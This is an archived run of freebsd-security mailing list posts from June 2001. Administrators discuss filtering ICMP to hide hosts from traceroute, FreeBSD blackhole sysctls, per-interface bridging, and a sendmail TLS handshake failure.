2001 Delivered-To: freebsd-security@freebsd.org Received: from NTMAIL.avint.net (ntmail.avint.net [198.165.75.239]) by hub.freebsd.org (Postfix) with ESMTP id 6428D37B401 for ; Wed, 27 Jun 2001 08:20:41 -0700 (PDT) (envelope-from graham@avint.net) Received: from hercules.avint.net ([198.165.75.7]) by NTMAIL.avint.net (Post.Office MTA v3.5.3 release 223 ID# 0-52622U2500L250S0V35) with SMTP id net for ; Wed, 27 Jun 2001 12:49:48 -02-3 From: Graham Rose Reply-To: graham@infotechcanada.com Organization: Avalon InterConnect & Infotech Canada To: Subject: RE: disable traceroute to my host Date: Wed, 27 Jun 2001 12:49:31 -0230 X-Mailer: KMail [version 1.0.28] Content-Type: text/plain References: In-Reply-To: MIME-Version: 1.0 Message-Id: <01062712515103.10969@hercules.avint.net> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org http://www.isi.edu/in-notes/iana/assignments/icmp-parameters www.iana.org On Wed, 27 Jun 2001, Peter Brezny wrote: > Peter, > > What is a good document to get more info on ICMP types? > > Thanks. > > Peter Brezny > SysAdmin Services Inc. > > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Peter Jeremy > Sent: Tuesday, June 26, 2001 5:15 PM > To: 3APA3A > Cc: alexus; freebsd-security@FreeBSD.ORG > Subject: Re: disable traceroute to my host > > > On 2001-Jun-26 15:08:13 +0400, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote: > >deny ICMP from (YOURNETWORK) to any icmptypes 0,3,11 out > > > >0 - to stop windows traceroute and ping > >3 - to stop BSD-style traceroute > >11 - to prevent intermediate router to reply traceroute > > Blocking ICMP type 3 will break Path-MTU discovery (which relies on > type 3 code 4). > > Peter > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 8:23:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from kcmgwp01.corp.sprint.com (parker1.sprint.com [208.18.122.165]) by hub.freebsd.org (Postfix) with ESMTP id A5B5937B401 for ; Wed, 27 Jun 2001 08:23:06 -0700 (PDT) (envelope-from steve.d.meacham@mail.sprint.com) Received: from kcmgwp02.corp.sprint.com (kcmgwp02 [10.185.6.93]) by kcmgwp01.corp.sprint.com (Switch-2.0.2/Switch-2.0.2) with ESMTP id f5RFMaV17189; Wed, 27 Jun 2001 10:22:38 -0500 (CDT) Received: from kcopmp01.corp.sprint.com (kcopmp01m.corp.sprint.com [10.74.2.72]) by kcmgwp02.corp.sprint.com (Switch-2.0.2/Switch-2.0.2) with ESMTP id f5RFMaW03514; Wed, 27 Jun 2001 10:22:36 -0500 (CDT) Received: from localhost (root@localhost) by kcopmp01.corp.sprint.com (8.8.6 (PHNE_17190)/8.8.6) with ESMTP id KAA15908; Wed, 27 Jun 2001 10:22:35 -0500 (CDT) From: steve.d.meacham@mail.sprint.com X-OpenMail-Hops: 1 Date: Wed, 27 Jun 2001 10:22:35 -0500 Message-Id: Subject: RE: disable traceroute to my host MIME-Version: 1.0 To: peter.jeremy@alcatel.com.au, peter@sysadmin-inc.com Cc: freebsd-security@FreeBSD.ORG Content-Type: multipart/mixed; boundary="openmail-part-484610c8-00000001" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --openmail-part-484610c8-00000001 Content-Type: text/plain; charset=US-ASCII Content-Disposition: inline ;Creation-Date="Wed, 27 Jun 2001 10:22:35 -0500" Content-Transfer-Encoding: 7bit Check out the book "Building Internet Firewalls" by Zwicky, Cooper & Chapman from O'Reilly. It describes ICMP types and how to filter and deal with them. It also covers most of the other protocols you're likely to encounter as a firewall administrator. Oh... ISBN 1-56592-871-7 Steven -----Original Message----- From: peter [mailto:peter@sysadmin-inc.com] Sent: Wednesday, June 27, 2001 10:14 AM To: peter.jeremy Cc: peter; freebsd-security Subject: RE: disable traceroute to my host Peter, What is a good document to get more info on ICMP types? Thanks. Peter Brezny SysAdmin Services Inc. -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Peter Jeremy Sent: Tuesday, June 26, 2001 5:15 PM To: 3APA3A Cc: alexus; freebsd-security@FreeBSD.ORG Subject: Re: disable traceroute to my host On 2001-Jun-26 15:08:13 +0400, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote: >deny ICMP from (YOURNETWORK) to any icmptypes 0,3,11 out > >0 - to stop windows traceroute and ping >3 - to stop BSD-style traceroute >11 - to prevent intermediate router to reply traceroute Blocking ICMP type 3 will break Path-MTU discovery (which relies on type 3 code 4). Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message --openmail-part-484610c8-00000001-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 8:23:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from bunrab.catwhisker.org (adsl-63-193-123-122.dsl.snfc21.pacbell.net [63.193.123.122]) by hub.freebsd.org (Postfix) with ESMTP id 3A89E37B405 for ; Wed, 27 Jun 2001 08:23:24 -0700 (PDT) (envelope-from david@catwhisker.org) Received: (from david@localhost) by bunrab.catwhisker.org (8.11.4/8.11.4) id f5RFMxF45954 for freebsd-security@FreeBSD.ORG; Wed, 27 Jun 2001 08:22:59 -0700 (PDT) Date: Wed, 27 Jun 2001 08:22:59 -0700 (PDT) From: David Wolfskill Message-Id: <200106271522.f5RFMxF45954@bunrab.catwhisker.org> Subject: RE: disable traceroute to my host Cc: freebsd-security@FreeBSD.ORG In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >From: "Peter Brezny" >Date: Wed, 27 Jun 2001 11:14:26 -0400 >Peter, >What is a good document to get more info on ICMP types? Well, I'm not PEter, but one of the best is at http://www.isi.edu/in-notes/iana/assignments/icmp-parameters; there's a link to it from http://www.iana.org/numbers.html. Cheers, david -- David H. Wolfskill david@catwhisker.org As a computing professional, I believe it would be unethical for me to advise, recommend, or support the use (save possibly for personal amusement) of any product that is or depends on any Microsoft product. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 9:46:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from prox.centtech.com (moat2.centtech.com [206.196.95.21]) by hub.freebsd.org (Postfix) with ESMTP id 998CB37B409 for ; Wed, 27 Jun 2001 09:46:18 -0700 (PDT) (envelope-from anderson@centtech.com) Received: (from smap@localhost) by prox.centtech.com (8.9.3+Sun/8.9.3) id LAA21923 for ; Wed, 27 Jun 2001 11:46:15 -0500 (CDT) Received: from sprint.centtech.com(10.177.173.31) by prox via smap (V2.1+anti-relay+anti-spam) id xma021921; Wed, 27 Jun 01 11:46:13 -0500 Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.9.3+Sun/8.9.3) with ESMTP id LAA21410 for ; Wed, 27 Jun 2001 11:46:13 -0500 (CDT) Message-ID: <3B3A0DD7.87EDC7E@centtech.com> Date: Wed, 27 Jun 2001 11:46:15 -0500 From: Eric Anderson Reply-To: anderson@centtech.com Organization: Centaur Technology X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.2.14-5.0smp i686) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: 3 nics - 1 bridge - 2 ips - bad? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Lets say I have 3 NIC's in a machine running FreeBSD 4.2. Is it possible to have this sort of configuration: xl0 - 200.200.200.200 - [interface 1 of bridge0] xl1 - NO IP - [interface 2 of bridge0] xl2 - 192.168.10.10 - not part of any bridge the 200.200.200.200 number is of course made up, but signifies an interface on the unprotected net. The 192.168.10.10 interface is also made up, showing an interface on the protected internal net. Now, the xl1 interface is bridged to xl0, creating a port for passing thru to the unprotected net that xl0 is on. Is there any inherent security flaws in this configuration (besides having a possible computer plug into the xl1 port and not being behind a firewall), assuming it works at all? Thanks in advance.. Eric -- ------------------------------------------------------------------------------- Eric Anderson anderson@centtech.com Centaur Technology (512) 418-5792 For every complex problem, there is a solution that is simple, neat, and wrong. ------------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 10:12:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from zogbe.tasam.com (cj45658-a.reston1.va.home.com [65.9.36.73]) by hub.freebsd.org (Postfix) with ESMTP id EC1A937B401 for ; Wed, 27 Jun 2001 10:12:12 -0700 (PDT) (envelope-from freebsd@fireduck.com) Received: from battleship (zogbe.tasam.com [10.45.45.11] (may be forged)) by zogbe.tasam.com (8.11.4/8.11.4) with SMTP id f5RHCCL36855; Wed, 27 Jun 2001 13:12:12 -0400 (EDT) Message-ID: <006101c0ff2c$4d75bee0$0a2d2d0a@battleship> From: "Joseph Gleason" To: , References: <3B3A0DD7.87EDC7E@centtech.com> Subject: Re: 3 nics - 1 bridge - 2 ips - bad? Date: Wed, 27 Jun 2001 13:12:10 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.3018.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think you might have a problem with the bridging. I'm not sure if you can bridge xl0 and xl1 without including xl2. I could be wrong And you might be able to pull something off with IPFW rules to exclude xl2 from the bridging, but I wouldn't trust it. What you want certainly looks like two separate and possibly incompatible tasks. My advise would be have two machines do this if at all possible. Machine one being your ethernet bridge. Machine two being the gateway to your protected network. ----- Original Message ----- From: "Eric Anderson" To: Sent: Wednesday, June 27, 2001 12:46 Subject: 3 nics - 1 bridge - 2 ips - bad? > Lets say I have 3 NIC's in a machine running FreeBSD 4.2. > Is it possible to have this sort of configuration: > xl0 - 200.200.200.200 - [interface 1 of bridge0] > xl1 - NO IP - [interface 2 of bridge0] > xl2 - 192.168.10.10 - not part of any bridge > > the 200.200.200.200 number is of course made up, but signifies an > interface on the unprotected net. The 192.168.10.10 interface is also > made up, showing an interface on the protected internal net. Now, the > xl1 interface is bridged to xl0, creating a port for passing thru to the > unprotected net that xl0 is on. Is there any inherent security flaws in > this configuration (besides having a possible computer plug into the xl1 > port and not being behind a firewall), assuming it works at all? > > Thanks in advance.. > > Eric > > > > -- > -------------------------------------------------------------------------- ----- > Eric Anderson anderson@centtech.com Centaur Technology (512) > 418-5792 > For every complex problem, there is a solution that is simple, neat, and > wrong. > -------------------------------------------------------------------------- ----- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 10:28:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from prox.centtech.com (moat2.centtech.com [206.196.95.21]) by hub.freebsd.org (Postfix) with ESMTP id A854C37B409 for ; Wed, 27 Jun 2001 10:28:29 -0700 (PDT) (envelope-from anderson@centtech.com) Received: (from smap@localhost) by prox.centtech.com (8.9.3+Sun/8.9.3) id MAA23119; Wed, 27 Jun 2001 12:28:23 -0500 (CDT) Received: from sprint.centtech.com(10.177.173.31) by prox via smap (V2.1+anti-relay+anti-spam) id xma023115; Wed, 27 Jun 01 12:28:08 -0500 Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.9.3+Sun/8.9.3) with ESMTP id MAA23975; Wed, 27 Jun 2001 12:28:07 -0500 (CDT) Message-ID: <3B3A17A9.5ADF75BA@centtech.com> Date: Wed, 27 Jun 2001 12:28:09 -0500 From: Eric Anderson Reply-To: anderson@centtech.com Organization: Centaur Technology X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.2.14-5.0smp i686) X-Accept-Language: en MIME-Version: 1.0 To: Joseph Gleason Cc: freebsd-security@freebsd.org Subject: Re: 3 nics - 1 bridge - 2 ips - bad? References: <3B3A0DD7.87EDC7E@centtech.com> <006101c0ff2c$4d75bee0$0a2d2d0a@battleship> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thanks for the response.. I think you're correct here, I don't see anyway to only enable 2 out of 3 interfaces for bridging. Darn. Oh well, thanks! Joseph Gleason wrote: > > I think you might have a problem with the bridging. > > I'm not sure if you can bridge xl0 and xl1 without including xl2. I could > be wrong > And you might be able to pull something off with IPFW rules to exclude xl2 > from the bridging, but I wouldn't trust it. > > What you want certainly looks like two separate and possibly incompatible > tasks. My advise would be have two machines do this if at all possible. > Machine one being your ethernet bridge. Machine two being the gateway to > your protected network. > > ----- Original Message ----- > From: "Eric Anderson" > To: > Sent: Wednesday, June 27, 2001 12:46 > Subject: 3 nics - 1 bridge - 2 ips - bad? > > > Lets say I have 3 NIC's in a machine running FreeBSD 4.2. > > Is it possible to have this sort of configuration: > > xl0 - 200.200.200.200 - [interface 1 of bridge0] > > xl1 - NO IP - [interface 2 of bridge0] > > xl2 - 192.168.10.10 - not part of any bridge > > > > the 200.200.200.200 number is of course made up, but signifies an > > interface on the unprotected net. The 192.168.10.10 interface is also > > made up, showing an interface on the protected internal net. Now, the > > xl1 interface is bridged to xl0, creating a port for passing thru to the > > unprotected net that xl0 is on. Is there any inherent security flaws in > > this configuration (besides having a possible computer plug into the xl1 > > port and not being behind a firewall), assuming it works at all? > > > > Thanks in advance.. > > > > Eric > > > > > > > > -- > > -------------------------------------------------------------------------- > ----- > > Eric Anderson anderson@centtech.com Centaur Technology (512) > > 418-5792 > > For every complex problem, there is a solution that is simple, neat, and > > wrong. > > -------------------------------------------------------------------------- > ----- > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- ------------------------------------------------------------------------------- Eric Anderson anderson@centtech.com Centaur Technology (512) 418-5792 For every complex problem, there is a solution that is simple, neat, and wrong. ------------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 10:31:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from zogbe.tasam.com (cj45658-a.reston1.va.home.com [65.9.36.73]) by hub.freebsd.org (Postfix) with ESMTP id CD6EC37B405 for ; Wed, 27 Jun 2001 10:31:28 -0700 (PDT) (envelope-from clash@fireduck.com) Received: from battleship (zogbe.tasam.com [10.45.45.11] (may be forged)) by zogbe.tasam.com (8.11.4/8.11.4) with SMTP id f5RHVRL37050; Wed, 27 Jun 2001 13:31:27 -0400 (EDT) Message-ID: <002201c0ff2e$fe7c4770$0a2d2d0a@battleship> From: "Joseph Gleason" To: , "Joseph Gleason" Cc: References: <3B3A0DD7.87EDC7E@centtech.com> <006101c0ff2c$4d75bee0$0a2d2d0a@battleship> <3B3A17A9.5ADF75BA@centtech.com> Subject: Re: 3 nics - 1 bridge - 2 ips - bad? Date: Wed, 27 Jun 2001 13:31:26 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.3018.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I was wrong! Don't listen to my lies! I am told that bridging can indeed be enabled and disabled per port via some sysctl call. With bridge compiled into the kernel: sysctl -A |grep bridge should give you the approriate parameter to play with. ----- Original Message ----- From: "Eric Anderson" To: "Joseph Gleason" Cc: Sent: Wednesday, June 27, 2001 13:28 Subject: Re: 3 nics - 1 bridge - 2 ips - bad? > Thanks for the response.. I think you're correct here, I don't see > anyway to only enable 2 out of 3 interfaces for bridging. Darn. Oh > well, thanks! > > > > Joseph Gleason wrote: > > > > I think you might have a problem with the bridging. > > > > I'm not sure if you can bridge xl0 and xl1 without including xl2. I could > > be wrong > > And you might be able to pull something off with IPFW rules to exclude xl2 > > from the bridging, but I wouldn't trust it. > > > > What you want certainly looks like two separate and possibly incompatible > > tasks. My advise would be have two machines do this if at all possible. > > Machine one being your ethernet bridge. Machine two being the gateway to > > your protected network. > > > > ----- Original Message ----- > > From: "Eric Anderson" > > To: > > Sent: Wednesday, June 27, 2001 12:46 > > Subject: 3 nics - 1 bridge - 2 ips - bad? > > > > > Lets say I have 3 NIC's in a machine running FreeBSD 4.2. > > > Is it possible to have this sort of configuration: > > > xl0 - 200.200.200.200 - [interface 1 of bridge0] > > > xl1 - NO IP - [interface 2 of bridge0] > > > xl2 - 192.168.10.10 - not part of any bridge > > > > > > the 200.200.200.200 number is of course made up, but signifies an > > > interface on the unprotected net. The 192.168.10.10 interface is also > > > made up, showing an interface on the protected internal net. Now, the > > > xl1 interface is bridged to xl0, creating a port for passing thru to the > > > unprotected net that xl0 is on. Is there any inherent security flaws in > > > this configuration (besides having a possible computer plug into the xl1 > > > port and not being behind a firewall), assuming it works at all? > > > > > > Thanks in advance.. > > > > > > Eric > > > > > > > > > > > > -- > > > -------------------------------------------------------------------------- > > ----- > > > Eric Anderson anderson@centtech.com Centaur Technology (512) > > > 418-5792 > > > For every complex problem, there is a solution that is simple, neat, and > > > wrong. > > > -------------------------------------------------------------------------- > > ----- > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > -- > -------------------------------------------------------------------------- ----- > Eric Anderson anderson@centtech.com Centaur Technology (512) > 418-5792 > For every complex problem, there is a solution that is simple, neat, and > wrong. > -------------------------------------------------------------------------- ----- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 11: 6:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id 2A47C37B406; Wed, 27 Jun 2001 11:06:12 -0700 (PDT) (envelope-from gshapiro@gshapiro.net) Received: from horsey.gshapiro.net (gshapiro@localhost [127.0.0.1]) by horsey.gshapiro.net (8.12.0.Beta12/8.12.0.Beta11) with ESMTP id f5RI65aj057332 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Wed, 27 Jun 2001 11:06:05 -0700 (PDT) Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.0.Beta12/8.12.0.Beta12) id f5RI63JP057329; Wed, 27 Jun 2001 11:06:03 -0700 (PDT) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15162.8331.758404.12379@horsey.gshapiro.net> Date: Wed, 27 Jun 2001 11:06:03 -0700 From: Gregory Neil Shapiro To: Cc: , Subject: Re: help on TLS error In-Reply-To: <004501c0fe09$c3d74640$a800000a@pentalpha.com.hk> References: <004501c0fe09$c3d74640$a800000a@pentalpha.com.hk> X-Mailer: VM 6.92 under 21.5 (beta1) "anise" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org danny> I found the following error in the log file and the email cannot be send danny> out. How can I find it? And what wrong with it? danny> Jun 26 14:16:40 host sendmail[1069]: f5M9Rr631838: ruleset=tls_server, danny> arg1=SOFTWARE, relay=mail.xxx.com, reject=403 4.7.0 ... TLS danny> handshake failed. Take a look at PR 28361: http://www.FreeBSD.org/cgi/query-pr.cgi?pr=28361 It contains a patch with allows you to enable an FFR and disable TLS for certain *broken* sites such as the one you have found. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 11:34:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id 33DF737B405 for ; Wed, 27 Jun 2001 11:34:51 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 81741 invoked from network); 27 Jun 2001 18:35:46 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 27 Jun 2001 18:35:46 -0000 Message-ID: <003701c0ff37$e229faa0$01000001@book> From: "alexus" To: "3APA3A" <3APA3A@SECURITY.NNOV.RU>, "Peter Jeremy" Cc: References: <006a01c0fb6b$2d64d830$9865fea9@book> <771487721300.20010623150519@SECURITY.NNOV.RU> <009201c0fdad$57c2af00$9865fea9@book> <3181060651.20010626150813@SECURITY.NNOV.RU> <20010627071504.P95583@gsmx07.alcatel.com.au> <79255173079.20010627114324@SECURITY.NNOV.RU> Subject: Re: Re[2]: disable traceroute to my host Date: Wed, 27 Jun 2001 14:35:04 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1251" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org from someone earlier post.. i suggest to check this out http://www.isi.edu/in-notes/iana/assignments/icmp-parameters ----- Original Message ----- From: "3APA3A" <3APA3A@SECURITY.NNOV.RU> To: "Peter Jeremy" Cc: "alexus" ; Sent: Wednesday, June 27, 2001 3:43 AM Subject: Re[2]: disable traceroute to my host > Hello Peter, > > > > --Wednesday, June 27, 2001, 1:15:04 AM, you wrote to 3APA3A@SECURITY.NNOV.RU: > > PJ> On 2001-Jun-26 15:08:13 +0400, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote: > >>deny ICMP from (YOURNETWORK) to any icmptypes 0,3,11 out > >> > >>0 - to stop windows traceroute and ping > >>3 - to stop BSD-style traceroute > >>11 - to prevent intermediate router to reply traceroute > > PJ> Blocking ICMP type 3 will break Path-MTU discovery (which relies on > PJ> type 3 code 4). > > It's possible to combine - deny incoming UDP and outgoing ICMP types > 0, 11. > > In any case - there are thousand ways to discover route. Use NAT to > hide internal network. > > PJ> Peter > > PJ> To Unsubscribe: send mail to majordomo@FreeBSD.org > PJ> with "unsubscribe freebsd-security" in the body of the message > > > -- > ~/3APA3A > Âñåãäà áóäåì ðàäû ïîñëóøàòü âàøå ÷èðèêàíüå (Òâåí) > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 12: 2:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from d170h113.resnet.uconn.edu (d170h113.resnet.uconn.edu [137.99.170.113]) by hub.freebsd.org (Postfix) with SMTP id 2BC0437B405 for ; Wed, 27 Jun 2001 12:02:31 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net) Received: (qmail 40296 invoked by uid 1001); 27 Jun 2001 19:05:15 -0000 Message-ID: <20010627190515.40295.qmail@d170h113.resnet.uconn.edu> References: <006a01c0fb6b$2d64d830$9865fea9@book> <771487721300.20010623150519@SECURITY.NNOV.RU> <009201c0fdad$57c2af00$9865fea9@book> <3181060651.20010626150813@SECURITY.NNOV.RU> <20010627071504.P95583@gsmx07.alcatel.com.au> <79255173079.20010627114324@SECURITY.NNOV.RU> <003701c0ff37$e229faa0$01000001@book> In-Reply-To: <003701c0ff37$e229faa0$01000001@book> From: "Peter C. Lai" To: "alexus" Cc: freebsd-security@FreeBSD.ORG Subject: Re: disable traceroute to my host Date: Wed, 27 Jun 2001 19:05:15 GMT Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org alexus writes: > from someone earlier post.. i suggest to check this out > > http://www.isi.edu/in-notes/iana/assignments/icmp-parameters > > ----- Original Message ----- > From: "3APA3A" <3APA3A@SECURITY.NNOV.RU> > To: "Peter Jeremy" > Cc: "alexus" ; > Sent: Wednesday, June 27, 2001 3:43 AM > Subject: Re[2]: disable traceroute to my host > > >> Hello Peter, >> >> >> >> --Wednesday, June 27, 2001, 1:15:04 AM, you wrote to > 3APA3A@SECURITY.NNOV.RU: >> >> PJ> On 2001-Jun-26 15:08:13 +0400, 3APA3A <3APA3A@SECURITY.NNOV.RU> wrote: >> >>deny ICMP from (YOURNETWORK) to any icmptypes 0,3,11 out >> >> >> >>0 - to stop windows traceroute and ping >> >>3 - to stop BSD-style traceroute >> >>11 - to prevent intermediate router to reply traceroute >> >> PJ> Blocking ICMP type 3 will break Path-MTU discovery (which relies on >> PJ> type 3 code 4). >> >> It's possible to combine - deny incoming UDP and outgoing ICMP types >> 0, 11. >> >> In any case - there are thousand ways to discover route. Use NAT to >> hide internal network. >> >> PJ> Peter >> >> PJ> To Unsubscribe: send mail to majordomo@FreeBSD.org >> PJ> with "unsubscribe freebsd-security" in the body of the message >> >> >> -- >> ~/3APA3A >> Âñåãäà áóäåì ðàäû ïîñëóøàòü âàøå ÷èðèêàíüå (Òâåí) >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message There's no significant reason to block traceroute (and ICMP types). First, it doesn't improve your "security" (well maybe your false sense of security). Second, blocking ICMP types breaks the RFC(s), which means that in some cases, routing breaks etc. This has been discussed in length on the list before; you can read it yourself. Third, please try to read all the mail in a thread before posting 11 times to 11 messages in a row. ----------- Peter C. Lai University of Connecticut Dept. of Residential Life | Programmer Dept. of Molecular and Cell Biology | Undergraduate Research Assistant/Honors Program http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 12:17:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from db.nexgen.com (db.nexgen.com [64.81.208.78]) by hub.freebsd.org (Postfix) with SMTP id A408637B401 for ; Wed, 27 Jun 2001 12:17:08 -0700 (PDT) (envelope-from ml@db.nexgen.com) Received: (qmail 82049 invoked from network); 27 Jun 2001 19:18:03 -0000 Received: from localhost.nexgen.com (HELO book) (root@127.0.0.1) by localhost.nexgen.com with SMTP; 27 Jun 2001 19:18:03 -0000 Message-ID: <001101c0ff3d$ca013aa0$01000001@book> From: "alexus" To: "Ryan Masse" Cc: References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> <002701c0fe76$7530eab0$01000001@book> <003401c0fe93$a3f405e0$3200a8c0@Home> Subject: Re: disable traceroute to my host Date: Wed, 27 Jun 2001 15:17:21 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org sounds good.. although what is tcp there for? ----- Original Message ----- From: "Ryan Masse" To: "alexus" Cc: Sent: Tuesday, June 26, 2001 6:59 PM Subject: Re: disable traceroute to my host > did u get my post about blackhole? > > man blackhole > > In the UDP instance, enabling blackhole behaviour turns off the sending > of an ICMP port unreachable message in response to a UDP datagram which > arrives on a port where there is no socket listening. It must be noted > that this behaviour will prevent remote systems from running > traceroute(8) to your system. > > > The following would enable the use of backhole of your system; > sysctl -w net.inet.tcp.blackhole=2 > sysctl -w net.inet.udp.blackhole=1 > > The above would block *nix traceroutes using the udp method. 